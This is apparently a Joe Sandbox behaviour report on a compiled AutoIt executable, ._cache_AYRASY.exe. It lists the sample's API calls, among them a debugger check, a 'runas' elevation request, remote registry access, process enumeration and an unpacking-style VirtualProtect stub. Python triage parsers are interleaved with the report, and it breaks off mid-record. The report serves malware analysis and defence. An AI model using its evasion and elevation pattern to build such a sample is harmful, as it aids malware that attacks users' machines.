102757->102804 102758 1c234d 102758->102600 102760 1c243f 102764 1bbe47 50 API calls 102760->102764 102761 1c2379 102761->102758 102761->102760 102763 1c23bb 102761->102763 102766 1784a6 81 API calls 102763->102766 102767 1c2446 102764->102767 102774 1c23c2 102766->102774 102823 1b689f SetFilePointerEx SetFilePointerEx WriteFile 102767->102823 102769 1c23f6 102785 1b67dc 102769->102785 102771 1c2400 102817 177b6e 102771->102817 102774->102769 102774->102771 102779 1c23fe Mailbox 102779->102758 102781 1750ec CloseHandle 102779->102781 102783 1c2490 102781->102783 102786 1b67ec 102785->102786 102787 1b67f6 102785->102787 102841 1b6917 SetFilePointerEx SetFilePointerEx WriteFile 102786->102841 102789 1b6808 102787->102789 102790 1b67fc 102787->102790 102792 1b6811 102789->102792 102793 1b6824 102789->102793 102842 1b68b9 51 API calls 102790->102842 102802 1b67f4 Mailbox 102802->102779 102803->102754 102805 1750ec CloseHandle 102804->102805 102806 174c04 102805->102806 102881 174b88 102806->102881 102816->102761 102818 19010a 48 API calls 102817->102818 102819 177b93 102818->102819 102820 17a6f8 48 API calls 102819->102820 102823->102779 102841->102802 102842->102802 102882 174ba1 CreateFileW 102881->102882 102883 1e4957 102881->102883 102936 1b6d8a __wsetenvp 102935->102936 102937 1b6db3 GetFileAttributesW 102936->102937 102938 1b6dc5 GetLastError 102937->102938 102946 1b6de3 102937->102946 102939 1b6dd0 CreateDirectoryW 102938->102939 102940 1b6de7 102938->102940 102939->102940 102939->102946 102941 173bcf 48 API calls 102940->102941 102940->102946 102942 1b6df7 _wcsrchr 102941->102942 102943 1b6d6d 48 API calls 102942->102943 102942->102946 102944 1b6e1b 102943->102944 102945 1b6e28 CreateDirectoryW 102944->102945 102944->102946 102945->102946 102946->102608 102948 17e216 102947->102948 103008 17e226 Mailbox 102947->103008 102949 17e670 102948->102949 102948->103008 103077 18ecee 417 API calls 102949->103077 102950 1bd520 86 API calls 102950->103008 102952 17e4fd 
105320->105437 105321 1827cf 105321->105320 105324 1827db 105321->105324 105322 182a84 105331 17d380 55 API calls 105322->105331 105326 1827ef 105324->105326 105336 1e865a 105324->105336 105329 1e86c9 105326->105329 105330 182806 105326->105330 105328->105321 105328->105322 105347 182914 105328->105347 105334 1e8ac9 105329->105334 105335 17fa40 417 API calls 105329->105335 105332 17fa40 417 API calls 105330->105332 105333 182aab 105331->105333 105370 18281d 105332->105370 105338 17d2d2 53 API calls 105333->105338 105452 1bd520 86 API calls 4 library calls 105334->105452 105339 1e86ee 105335->105339 105336->105329 105353 1829ec 105336->105353 105438 1cf211 417 API calls 105336->105438 105439 1cf4df 417 API calls 105336->105439 105338->105347 105343 17d89e 50 API calls 105339->105343 105351 1e870a 105339->105351 105339->105353 105341 1e8980 105447 1bd520 86 API calls 4 library calls 105341->105447 105342 182836 105342->105334 105348 17fa40 417 API calls 105342->105348 105343->105351 105344 17cdb4 48 API calls 105354 18296e 105344->105354 105347->105344 105372 18287c 105348->105372 105349 17c935 48 API calls 105349->105342 105350 1828cc 105350->105358 105432 17cf97 58 API calls 105350->105432 105357 1e878d 105351->105357 105440 17346e 48 API calls 105351->105440 105353->105313 105354->105353 105362 182984 105354->105362 105367 1e8a97 105354->105367 105375 1e89b4 105354->105375 105355 1828ac 105355->105350 105445 17cf97 58 API calls 105355->105445 105356 1e883f 105443 1cc235 417 API calls Mailbox 105356->105443 105357->105356 105361 1e882d 105357->105361 105441 1b4e71 53 API calls __cinit 105357->105441 105366 182900 105358->105366 105446 17cf97 58 API calls 105358->105446 105368 17ca8e 48 API calls 105361->105368 105362->105367 105433 1841fc 84 API calls 105362->105433 105364 1e8888 105369 1e888c 105364->105369 105364->105370 105366->105341 105366->105347 105367->105353 105451 174b02 50 API calls 105367->105451 105368->105356 105444 1bd520 86 API calls 4 library calls 
105369->105444 105370->105342 105370->105349 105370->105353 105372->105353 105372->105355 105378 17fa40 417 API calls 105372->105378 105417 1cbf80 105375->105417 105377 1829b8 105379 1e8a7e 105377->105379 105434 1841fc 84 API calls 105377->105434 105385 1e88ff 105378->105385 105450 18ee93 84 API calls 105379->105450 105380 1e8725 105380->105361 105393 1814a0 48 API calls 105380->105393 105382 1e8813 105390 17d89e 50 API calls 105382->105390 105383 1e87ca 105383->105382 105388 1784a6 81 API calls 105383->105388 105385->105353 105391 17d89e 50 API calls 105385->105391 105387 1e89f3 105398 1e8a42 105387->105398 105399 1e8a01 105387->105399 105405 1e87e0 105388->105405 105389 1829ca 105389->105353 105394 1e8a6f 105389->105394 105395 1829e5 105389->105395 105392 1e8821 105390->105392 105391->105355 105396 17d89e 50 API calls 105392->105396 105397 1e875d 105393->105397 105449 1cd1da 50 API calls 105394->105449 105402 19010a 48 API calls 105395->105402 105396->105361 105397->105361 105406 1814a0 48 API calls 105397->105406 105400 17d89e 50 API calls 105398->105400 105403 17ca8e 48 API calls 105399->105403 105404 1e8a4b 105400->105404 105402->105353 105403->105353 105407 17d89e 50 API calls 105404->105407 105405->105382 105442 1ba76d 49 API calls 105405->105442 105409 1e8775 105406->105409 105410 1e8a57 105407->105410 105412 17d89e 50 API calls 105409->105412 105448 174b02 50 API calls 105410->105448 105411 1e8807 105414 17d89e 50 API calls 105411->105414 105415 1e8781 105412->105415 105414->105382 105416 17d89e 50 API calls 105415->105416 105416->105357 105420 1cbfd9 _memset 105417->105420 105419 1cc22e 105419->105387 105421 1cc14c 105420->105421 105422 1cc033 105420->105422 105425 1cc097 VariantInit 105420->105425 105421->105422 105423 1cc19f VariantInit VariantClear 105421->105423 105455 1cc235 417 API calls Mailbox 105422->105455 105424 1cc1c5 105423->105424 105424->105422 105426 1cc1e6 105424->105426 105429 1cc0d6 105425->105429 105454 1ba6f6 103 API calls 
105426->105454 105428 1cc20d VariantClear 105428->105419 105429->105422 105453 1ba6f6 103 API calls 105429->105453 105431->105328 105432->105358 105433->105377 105434->105389 105435->105355 105436->105320 105437->105336 105438->105336 105439->105336 105440->105380 105441->105383 105442->105411 105443->105364 105444->105353 105445->105350 105446->105366 105447->105353 105448->105353 105449->105379 105450->105367 105451->105334 105452->105353 105453->105421 105454->105428 105455->105419 105456 2e20d0 105457 2e20e0 105456->105457 105458 2e21fa LoadLibraryA 105457->105458 105462 2e223f VirtualProtect VirtualProtect 105457->105462 105459 2e2211 105458->105459 105459->105457 105461 2e2223 GetProcAddress 105459->105461 105461->105459 105464 2e2239 ExitProcess 105461->105464 105463 2e22a4 105462->105463 105463->105463
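The flattened execution graph above can be parsed back into per-subgraph call chains. The Python below is an added example written for this page, not code from the Joe Sandbox report or from Joe Sandbox itself; the token grammar it assumes (six-digit node ids, `id->id` edges, `id addr label...` node definitions) is inferred from the flattened text, not documented anywhere, and the input is a constructed excerpt of two subgraphs from the graph above (the tray-icon update at 1738e4 and the stub at 2e20d0).

```python
"""Recover API call chains from a Joe Sandbox execution graph that page extraction has
flattened into one token stream. Added example; not code from the report or Joe Sandbox.
Token grammar inferred from the flattened text:
    edge := <id>-><id>               e.g. 105457->105458
    node := <id> <addr> <label>*     e.g. 105458 2e21fa LoadLibraryA
<id> is a six-digit decimal counter, <addr> the function's hex address, and labels run
until the next edge or node id, so "48 API calls" is three label tokens on one node."""
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d{6}$")
# Heuristic for Win32/NT API names among labels: upper-case start, a lower-case letter, then
# another upper-case letter later (KillTimer, RtlFreeHeap, Shell_NotifyIconW). CRT internals
# (_memset) and annotations ("48 API calls", "Mailbox") do not match; single-hump APIs are listed.
API_RE = re.compile(r"^[A-Z][A-Za-z0-9_]*[a-z][A-Za-z0-9_]*[A-Z][A-Za-z0-9_]*$")
SINGLE_WORD_APIS = {"Sleep"}

# Constructed input: two subgraphs copied from the graph above, with the edge into 1738e4
# left out so that node is a root of its subgraph.
SAMPLE = """
104239 1738e4 104226 171eda KillTimer SetTimer 104226->104223 104227 171e96 104227->104226
104228 1e4518 Shell_NotifyIconW 104227->104228 104228->104226 104240 1739d5 Mailbox
104239->104240 104241 173900 104239->104241 104240->104227 104242 177b6e 48 API calls 104241->104242
105456 2e20d0 105457 2e20e0 105456->105457 105458 2e21fa LoadLibraryA 105457->105458
105462 2e223f VirtualProtect VirtualProtect 105457->105462 105459 2e2211 105458->105459
105459->105457 105461 2e2223 GetProcAddress 105459->105461 105461->105459
105464 2e2239 ExitProcess 105461->105464 105463 2e22a4 105462->105463 105463->105463
"""


def is_api(token):
    return token in SINGLE_WORD_APIS or API_RE.match(token) is not None


def parse_graph(text):
    """Return (nodes, succ): nodes[id] = {"addr": hex str or None, "labels": [...]},
    succ[id] = set of callee ids. Edges may name a node before it is defined."""
    nodes, succ = {}, defaultdict(set)
    tokens = text.split()
    last = None  # most recently defined node, for a label that wrapped onto a new line
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            src, dst = edge.groups()
            succ[src].add(dst)
            nodes.setdefault(src, {"addr": None, "labels": []})
            nodes.setdefault(dst, {"addr": None, "labels": []})
            i += 1
        elif NODE_ID_RE.match(tok) and i + 1 < len(tokens):
            node = nodes.setdefault(tok, {"addr": None, "labels": []})
            node["addr"] = tokens[i + 1]  # positional: an address such as 173900 looks like an id
            i += 2
            while i < len(tokens) and not EDGE_RE.match(tokens[i]) and not NODE_ID_RE.match(tokens[i]):
                node["labels"].append(tokens[i])
                i += 1
            last = node
        else:
            if last is not None:
                last["labels"].append(tok)
            i += 1
    return nodes, succ


def components(nodes, succ):
    """Weakly connected components as sorted lists of node ids."""
    adj = defaultdict(set)
    for src, dsts in succ.items():
        for dst in dsts:
            adj[src].add(dst)
            adj[dst].add(src)
    seen, comps = set(), []
    for start in sorted(nodes):
        if start in seen:
            continue
        seen.add(start)
        comp, queue = [], deque([start])
        while queue:
            n = queue.popleft()
            comp.append(n)
            for m in adj[n]:
                if m not in seen:
                    seen.add(m)
                    queue.append(m)
        comps.append(sorted(comp))
    return comps


def tags_for(apis):
    """Triage tags for one subgraph, derived only from the API names it contains."""
    s, tags = set(apis), []
    if "GetProcAddress" in s and ({"LoadLibraryA", "LoadLibraryW"} & s):
        tags.append("resolves imports by name at run time")
    if "VirtualProtect" in s:
        tags.append("changes page protection")
    if "Shell_NotifyIconW" in s:
        tags.append("manages a tray icon")
    return tags


def summarize(text):
    """One record per subgraph: entry addresses (nodes nobody calls), the API names seen
    anywhere in it, and triage tags; sorted by entry address."""
    nodes, succ = parse_graph(text)
    called = {d for ds in succ.values() for d in ds}
    records = []
    for comp in components(nodes, succ):
        apis = sorted({t for n in comp for t in nodes[n]["labels"] if is_api(t)})
        roots = sorted(nodes[n]["addr"] or n for n in comp if n not in called)
        records.append({"roots": roots, "apis": apis, "tags": tags_for(apis)})
    return sorted(records, key=lambda r: r["roots"])


if __name__ == "__main__":
    for rec in summarize(SAMPLE):
        print(rec["roots"], ", ".join(rec["apis"]), rec["tags"])
```

Feeding the full graph text to `summarize` (joining the wrapped lines with whitespace first) yields one record per subgraph; the 2e20d0 record is the one to look at first, because a subgraph that resolves imports by name and then calls VirtualProtect is where an unpacked payload usually surfaces in the memory dumps.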
APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0017376D
  • Part of subcall function 00174257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,00000000,00000001,00000000), ref: 0017428C
• IsDebuggerPresent.KERNEL32(?,?), ref: 0017377F
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_AYRASY.exe,00000104,?,00231120,C:\Users\user\Desktop\._cache_AYRASY.exe,00231124,?,?), ref: 001737EE
  • Part of subcall function 001734F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0017352A
• SetCurrentDirectoryW.KERNEL32(?), ref: 00173860
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00222934,00000010), ref: 001E21C5
• SetCurrentDirectoryW.KERNEL32(?,?), ref: 001E21FD
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 001E2232
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0020DAA4), ref: 001E2290
• ShellExecuteW.SHELL32(00000000), ref: 001E2297
  • Part of subcall function 001730A5: GetSysColorBrush.USER32(0000000F), ref: 001730B0
  • Part of subcall function 001730A5: LoadCursorW.USER32(00000000,00007F00), ref: 001730BF
  • Part of subcall function 001730A5: LoadIconW.USER32(00000063), ref: 001730D5
  • Part of subcall function 001730A5: LoadIconW.USER32(000000A4), ref: 001730E7
  • Part of subcall function 001730A5: LoadIconW.USER32(000000A2), ref: 001730F9
  • Part of subcall function 001730A5: RegisterClassExW.USER32(?), ref: 00173167
  • Part of subcall function 00172E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00172ECB
  • Part of subcall function 00172E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00172EEC
  • Part of subcall function 00172E9D: ShowWindow.USER32(00000000), ref: 00172F00
  • Part of subcall function 00172E9D: ShowWindow.USER32(00000000), ref: 00172F09
  • Part of subcall function 00173598: _memset.LIBCMT ref: 001735BE
  • Part of subcall function 00173598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00173667
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
• String ID: C:\Users\user\Desktop\._cache_AYRASY.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"#
• API String ID: 4253510256-292187363
• Opcode ID: ef8e86e1135d595b3fbf0ca2af00cbc546e0f34b2d445475e741ac88f69c3f2a
• Instruction ID: 504c646d4c341334c6995a1cfe693d48a161001d2ff9b8f262cee748cc23316a
• Opcode Fuzzy Hash: ef8e86e1135d595b3fbf0ca2af00cbc546e0f34b2d445475e741ac88f69c3f2a
• Instruction Fuzzy Hash: AA515AB0644284FBCB04ABB0FC4AFFD7B799B26700F108155FB9D92191D7704A95EB62
APIs
  • Part of subcall function 001D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D317F
  • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
  • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
• RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 001D321E
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001D32B6
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 001D34F5
• RegCloseKey.ADVAPI32(00000000), ref: 001D3502
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
• Opcode ID: 18034a19fb3f5c2a23bf2631d8d41b1d29520248e5c00846c690dfbc032d2898
• Instruction ID: 4287db88f2e2500d29169e6d71218b96475e8a65d9dc09b004aaa11298efc1b7
• Opcode Fuzzy Hash: 18034a19fb3f5c2a23bf2631d8d41b1d29520248e5c00846c690dfbc032d2898
• Instruction Fuzzy Hash: 4AE14A71204201AFCB15DF28C995E6ABBF9EF88314F04856DF45ADB2A1DB31EA41CB52
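The two API listings above carry the behaviour worth flagging in this report: the start-up function pairs IsDebuggerPresent with a ShellExecuteW call next to the "runas" verb and the compiled-AutoIt marker strings, and the registry function opens a remote registry connection with RegConnectRegistryW. The Python below is an added example, not code from the report or from Joe Sandbox; it parses the bullet syntax exactly as it appears in these listings, its triage rules name only behaviour visible in them, and its input is a constructed subset of those bullet lines.

```python
"""Triage the per-function "APIs" listings of a Joe Sandbox report. Added example for this
page; not code from the report or from Joe Sandbox. Bullet shapes handled, as they appear
in the listings above:
    • Api.MODULE(arg,arg,...), ref: ADDR
    • Part of subcall function ADDR: Api.MODULE(...), ref: ADDR     (nested call)
    • _memset.LIBCMT ref: ADDR                                       (no argument list)"""
import re
from dataclasses import dataclass
from typing import List, Optional

BULLET_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
PATH_RE = re.compile(r"^[A-Za-z]:\\")

# Constructed input: a subset of the bullets from the two listings above.
SAMPLE = """
APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0017376D
  • Part of subcall function 00174257: GetModuleFileNameW.KERNEL32(00000000,C:\\Users\\user\\Desktop\\._cache_AYRASY.exe,00000104,?,00000000,00000001,00000000), ref: 0017428C
• IsDebuggerPresent.KERNEL32(?,?), ref: 0017377F
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00222934,00000010), ref: 001E21C5
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0020DAA4), ref: 001E2290
• ShellExecuteW.SHELL32(00000000), ref: 001E2297
  • Part of subcall function 00172E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00172ECB
  • Part of subcall function 00173598: _memset.LIBCMT ref: 001735BE
  • Part of subcall function 00173598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00173667
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D317F
• CreatePopupMenu.USER32 ref: 00172A9F
"""


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # address of the callee that issues this call, if nested


def parse_api_listing(text):
    """Parse the bullets into Call records; headings and unmatched lines are skipped.
    Arguments are split on commas, so a string argument containing a comma would be
    split too (none of the listings above has one)."""
    calls = []
    for line in text.splitlines():
        m = BULLET_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def referenced_paths(calls):
    """File paths that appear as arguments (here the ._cache_ copy on the desktop)."""
    return sorted({a for c in calls for a in c.args if PATH_RE.match(a)})


def triage(calls):
    """Findings in a fixed order; each rule names behaviour visible in the listings above."""
    apis = {c.api for c in calls}
    args = [a for c in calls for a in c.args]
    findings = []
    if "IsDebuggerPresent" in apis:
        findings.append("debugger check (IsDebuggerPresent)")
    if "ShellExecuteW" in apis and "runas" in args:
        findings.append("ShellExecuteW with the runas verb (UAC elevation prompt)")
    if any("compiled AutoIt script" in a for a in args) or "AutoIt v3" in args:
        findings.append("compiled AutoIt script (runtime marker strings)")
    if "RegConnectRegistryW" in apis:
        findings.append("remote registry connection (RegConnectRegistryW)")
    if "Shell_NotifyIconW" in apis:
        findings.append("tray icon (Shell_NotifyIconW)")
    return findings


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    print(len(parsed), "calls; paths:", referenced_paths(parsed))
    for finding in triage(parsed):
        print("-", finding)
```

Note that the sandbox attributes "runas" to the GetForegroundWindow call immediately before ShellExecuteW, which is why the rule checks the verb across all arguments of the function rather than on the ShellExecuteW call alone; the "String ID" line of the listing confirms the verb belongs to this function.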
APIs
• NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00172A33
• KillTimer.USER32(?,00000001), ref: 00172A5D
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00172A80
• RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00172A8B
• CreatePopupMenu.USER32 ref: 00172A9F
• PostQuitMessage.USER32(00000000), ref: 00172AAE
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
• String ID: TaskbarCreated
• API String ID: 157504867-2362178303
• Opcode ID: 46dd93fed49a72190cc8f0f5c6422554ac217446f3b65254584e6653748cae81
• Instruction ID: cb210fa72d37c5abb3f92336f6955baa49dfde5f65e812e9a4a206e2d95c98fe
• Opcode Fuzzy Hash: 46dd93fed49a72190cc8f0f5c6422554ac217446f3b65254584e6653748cae81
• Instruction Fuzzy Hash: 1B414931214746ABDB386F68BC0DBBD36BAF729300F048115F90AD7991DB708CA2D765
APIs
• GetVersionExW.KERNEL32(?,00000000), ref: 0018E4A7
  • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
• GetCurrentProcess.KERNEL32(00000000,0020DC28,?,?), ref: 0018E567
• GetNativeSystemInfo.KERNEL32(?,0020DC28,?,?), ref: 0018E5BC
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0018E5C7
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0018E5DA
• GetSystemInfo.KERNEL32(?,0020DC28,?,?), ref: 0018E5E4
• GetSystemInfo.KERNEL32(?,0020DC28,?,?), ref: 0018E5F0
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
• String ID:
• API String ID: 2717633055-0
• Opcode ID: 7336c0534e191edd2fd9fd1740821e2c8693ed833d5c462fd4eb206a18628e1e
• Instruction ID: a6bffee5a4c8be6f2c7875a323dadf7bf5a70b6cbde8a4f7eed517361c2616fc
                                                                                                                              • Opcode Fuzzy Hash: 7336c0534e191edd2fd9fd1740821e2c8693ed833d5c462fd4eb206a18628e1e
                                                                                                                              • Instruction Fuzzy Hash: 3861DDB590A2D4CBCF15DF6898C15ED7FA46F2A308F2945D8D8489B20BD734CA48CF66
                                                                                                                              APIs
                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00173202
                                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00173219
                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 001E57D7
                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 001E57EC
                                                                                                                              • LockResource.KERNEL32(?), ref: 001E57FF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                              • String ID: SCRIPT
                                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                                              • Opcode ID: 0e6645a035a970fdf3ca9062052c89a29ca30d0224a4e5ee79f484537649f4a7
                                                                                                                              • Instruction ID: 5f56882f9d5f8eec572592dff47d35354273a34a9b36e45aae3ec937d5479fee
                                                                                                                              • Opcode Fuzzy Hash: 0e6645a035a970fdf3ca9062052c89a29ca30d0224a4e5ee79f484537649f4a7
                                                                                                                              • Instruction Fuzzy Hash: 7B117975204701BFE7218B65EC48F777BBAEBC9B51F218028F416866A0DB71DD40DAA0
                                                                                                                              APIs
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 001B6F7D
                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 001B6F8D
                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 001B6FAC
                                                                                                                              • __wsplitpath.LIBCMT ref: 001B6FD0
                                                                                                                              • _wcscat.LIBCMT ref: 001B6FE3
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001B7022
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1605983538-0
                                                                                                                              • Opcode ID: 8bd5608172f3c7258e69d79608d711c9dc5d5d7475d20fe434265a5841aaa343
                                                                                                                              • Instruction ID: 204b4e85df92b2b2cb49b4dc0606c20cef43f2ce6e72e7c6e2d4930e9abdaa94
